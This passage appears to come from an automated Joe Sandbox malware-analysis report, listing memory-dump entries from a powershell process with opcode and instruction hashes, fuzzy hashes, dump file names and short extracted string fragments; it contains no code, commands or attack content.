                                                                  • Opcode ID: 7a6c2c13f02066eeb5a4ef4b768c1b8d3688241ada193c0877bfdf043f25c505
                                                                  • Instruction ID: 3a1017d72d0dd2698bc8712ec7328dd41db0aba1e3702eefbcc6aa07aee32143
                                                                  • Opcode Fuzzy Hash: 7a6c2c13f02066eeb5a4ef4b768c1b8d3688241ada193c0877bfdf043f25c505
                                                                  • Instruction Fuzzy Hash: AD317AA27096558FCB26462C682126A7F77BFC2668B1900ABD045CF38BDE655D03C3A6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2647967633.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $eq$$eq$$eq$$eq$$eq$$eq
                                                                  • API String ID: 0-220072568
                                                                  • Opcode ID: cd5cfada5ca11f5a14e7c32fedf27e2b14ede036bc4ec67be4c89d731aad46e5
                                                                  • Instruction ID: 80f6c1880a625afa745c15a4085dba722590c68b17a9a778653d48ad0d94c18b
                                                                  • Opcode Fuzzy Hash: cd5cfada5ca11f5a14e7c32fedf27e2b14ede036bc4ec67be4c89d731aad46e5
                                                                  • Instruction Fuzzy Hash: 403128F2706287CFDF3689A9985027BBBA7AFE2119B24447FC451CB246DE31C445C352
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2647967633.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'eq$84wl$d%kq$d%kq$d%kq$tPeq
                                                                  • API String ID: 0-1405294227
                                                                  • Opcode ID: 884badff4963b58c878831a928de25084f46b6050275108a189732aba928bda0
                                                                  • Instruction ID: 4ec28cf3a483b9f4c48993166bc87a226181db8d82f552693a796cafbd5a9212
                                                                  • Opcode Fuzzy Hash: 884badff4963b58c878831a928de25084f46b6050275108a189732aba928bda0
                                                                  • Instruction Fuzzy Hash: E4318BB1B00215DFCB24CF58D851A6ABBB7EF89718F258559E805BB381C631ED42CBA1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2647967633.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 84wl$84wl$tPeq$tPeq$$eq
                                                                  • API String ID: 0-2173469166
                                                                  • Opcode ID: ff5e4b66a652f70d31e42252fb5dad8283b8d7d7777198ec9f479345ac6af6b0
                                                                  • Instruction ID: e4ea8ce0bbe097b4dd2376062e8501e8f6e84b55afcaa0bb9b53417d9457cbce
                                                                  • Opcode Fuzzy Hash: ff5e4b66a652f70d31e42252fb5dad8283b8d7d7777198ec9f479345ac6af6b0
                                                                  • Instruction Fuzzy Hash: C86106B1B00105DFCB259F68C44566ABBE7EF85714F14C46AD811AF256CB31ED43C7A1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2647967633.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'eq$4'eq$$eq$$eq$$eq
                                                                  • API String ID: 0-2942138008
                                                                  • Opcode ID: 1047cfaa5ea12f92e960d3daf8101a0a6f5f43a9768801e258a5e6970592368b
                                                                  • Instruction ID: dd09e3b3037a15382b6f652b5da61296e41ffe87f74bd65ce88182126b982c45
                                                                  • Opcode Fuzzy Hash: 1047cfaa5ea12f92e960d3daf8101a0a6f5f43a9768801e258a5e6970592368b
                                                                  • Instruction Fuzzy Hash: D14149F1B10306DFCB259E3898206BF7FB6AFC2214F44856AD515CB292DB36C945C7A2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2647967633.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'eq$4'eq$$eq$$eq$$eq
                                                                  • API String ID: 0-2942138008
                                                                  • Opcode ID: 581c0608407b39424ff63dd215bc1c3b6a264e12edc0f4c73ecae70d0c4bf9b5
                                                                  • Instruction ID: ed95be787a93a2601bb13a83a9862c238e3d5841fe297e4d4677cb7ece5b80cc
                                                                  • Opcode Fuzzy Hash: 581c0608407b39424ff63dd215bc1c3b6a264e12edc0f4c73ecae70d0c4bf9b5
                                                                  • Instruction Fuzzy Hash: 97417FF1710247DFCFA54E298440176B7A7BFC2218B6AC5AFE811CB291EB35C861C711
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2647967633.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'eq$4'eq$$eq$$eq$$eq
                                                                  • API String ID: 0-2942138008
                                                                  • Opcode ID: 2ee53535a866581527835dc969148169cba3141e1a2635a1902e639e80d41e21
                                                                  • Instruction ID: 0196cebbce9b359701676acf7979be71fecf42f49ee33eadbdb9fe872a1b29a9
                                                                  • Opcode Fuzzy Hash: 2ee53535a866581527835dc969148169cba3141e1a2635a1902e639e80d41e21
                                                                  • Instruction Fuzzy Hash: 343146F2704217CFCF264A798850676BBABAFC2358B24407AD411E7285DB35C443C362
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2654340763.00000000096F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 096F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_96f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (fyl$(fyl$(fyl$(fyl
                                                                  • API String ID: 0-4278018943
                                                                  • Opcode ID: 6c7c82a96ccbf4c517ea2df48ebf40a1426afb34f2b3b94cde08e19bd77d8898
                                                                  • Instruction ID: cc3b839cd5e0dc88f6f585894d3ef81f959d7d88f6599d83afb53a2669fa3048
                                                                  • Opcode Fuzzy Hash: 6c7c82a96ccbf4c517ea2df48ebf40a1426afb34f2b3b94cde08e19bd77d8898
                                                                  • Instruction Fuzzy Hash: 00C16074A00205DFDB14CF98C561AAEB7B2FF88314F24C169E915AB746DB32ED42CB91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2647967633.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ,Syl$,Syl$p5ik$xSyl
                                                                  • API String ID: 0-36022673
                                                                  • Opcode ID: b7d510bfaa37fb3dd7545880c9471387bdf57d409dbf0858b4e2696e539c8617
                                                                  • Instruction ID: 62297071d0ac94f2a4fbd33babb52360d5b778a3b2c5f98953ff2136d5cb7bb9
                                                                  • Opcode Fuzzy Hash: b7d510bfaa37fb3dd7545880c9471387bdf57d409dbf0858b4e2696e539c8617
                                                                  • Instruction Fuzzy Hash: 3D4129B1B083459FCB219B38940276ABFB5DF87324F14846BD559CB292D671ED40C7A1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2647967633.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $eq$$eq$$eq$$eq
                                                                  • API String ID: 0-812946093
                                                                  • Opcode ID: f4a416f89f8bb3f9d4bcbe922a48e7544860d73ead1479487158a8c7283bc98a
                                                                  • Instruction ID: 0e8121831b12bdfb0ed236484ccbebfd7b9e065dfaac5f84ad50e228b9aff880
                                                                  • Opcode Fuzzy Hash: f4a416f89f8bb3f9d4bcbe922a48e7544860d73ead1479487158a8c7283bc98a
                                                                  • Instruction Fuzzy Hash: 3F2138F2310286ABDB34597A9801B27BBDA9BC2719F24C43EA505CF381DD76D841D361